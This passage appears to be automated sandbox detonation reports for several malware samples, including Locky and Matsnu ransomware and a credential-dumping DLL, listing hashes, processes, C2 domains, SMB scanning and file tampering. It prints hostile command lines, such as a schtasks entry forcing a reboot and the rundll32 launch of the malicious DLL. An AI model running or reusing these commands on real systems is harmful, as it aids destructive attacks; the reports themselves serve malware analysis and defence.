memory/2744-10-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/1800-9-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/1800-12-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2744-11-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2744-13-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\container.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

memory/2744-2040-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win7-20240903-en

Max time kernel

140s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Signatures

Locky

ransomware locky

Locky family

locky

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Locky.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 uftsfoen.yt udp
US 8.8.8.8:53 iutmpmsonbt.us udp
US 8.8.8.8:53 ahvfvogmnn.de udp
US 8.8.8.8:53 nwsvnayfmdhdw.tf udp
US 8.8.8.8:53 fjuvgrafdqqd.be udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 hpwjw.pw udp
US 162.249.64.234:80 hpwjw.pw tcp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 hpwjw.pw tcp
IE 86.104.134.144:80 tcp

Files

memory/2148-0-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2148-1-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2148-2-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2148-4-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2148-5-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2148-8-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2148-10-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2148-12-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2148-13-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2148-14-0x0000000000400000-0x00000000007D1000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Signatures

Locky

ransomware locky

Locky family

locky

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Locky.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 fjuvgrafdqqd.be udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 hpwjw.pw udp
US 162.249.64.234:80 hpwjw.pw tcp
US 8.8.8.8:53 uftsfoen.yt udp
US 8.8.8.8:53 iutmpmsonbt.us udp
US 8.8.8.8:53 ahvfvogmnn.de udp
US 8.8.8.8:53 nwsvnayfmdhdw.tf udp
US 8.8.8.8:53 fjuvgrafdqqd.be udp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 hpwjw.pw tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 uftsfoen.yt udp
US 8.8.8.8:53 iutmpmsonbt.us udp
US 8.8.8.8:53 ahvfvogmnn.de udp
US 8.8.8.8:53 nwsvnayfmdhdw.tf udp
US 8.8.8.8:53 fjuvgrafdqqd.be udp
IE 86.104.134.144:80 tcp
US 162.249.64.234:80 hpwjw.pw tcp
US 8.8.8.8:53 uftsfoen.yt udp
US 8.8.8.8:53 iutmpmsonbt.us udp
US 8.8.8.8:53 ahvfvogmnn.de udp
US 8.8.8.8:53 nwsvnayfmdhdw.tf udp
US 8.8.8.8:53 fjuvgrafdqqd.be udp
IE 86.104.134.144:80 tcp

Files

memory/4808-0-0x0000000000940000-0x0000000000944000-memory.dmp

memory/4808-1-0x0000000000940000-0x0000000000944000-memory.dmp

memory/4808-2-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/4808-4-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/4808-6-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/4808-8-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/4808-11-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/4808-13-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/4808-15-0x0000000000400000-0x00000000007D1000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win7-20240903-en

Max time kernel

120s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\131.exe

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\131.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\131.exe

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3544 -ip 3544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 368

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

148s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A016.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASK.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RSSITEM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A016.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3068 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2532 wrote to memory of 2172 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2172 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2172 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2172 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1868 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\A016.tmp
PID 2532 wrote to memory of 1868 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\A016.tmp
PID 2532 wrote to memory of 1868 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\A016.tmp
PID 2532 wrote to memory of 1868 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\A016.tmp
PID 2172 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2172 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2172 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2172 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27

C:\Users\Admin\AppData\Local\Temp\A016.tmp

"C:\Users\Admin\AppData\Local\Temp\A016.tmp" \\.\pipe\{910001EC-46A2-4968-BD24-177A95D7E1E6}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27

Network

Country Destination Domain Proto
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/2532-0-0x0000000000250000-0x00000000002AE000-memory.dmp

memory/2532-8-0x0000000000250000-0x00000000002AE000-memory.dmp

memory/2532-9-0x0000000000250000-0x00000000002AE000-memory.dmp

memory/2532-11-0x0000000000250000-0x00000000002AE000-memory.dmp

\Users\Admin\AppData\Local\Temp\A016.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/2532-26-0x0000000000250000-0x00000000002AE000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

149s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
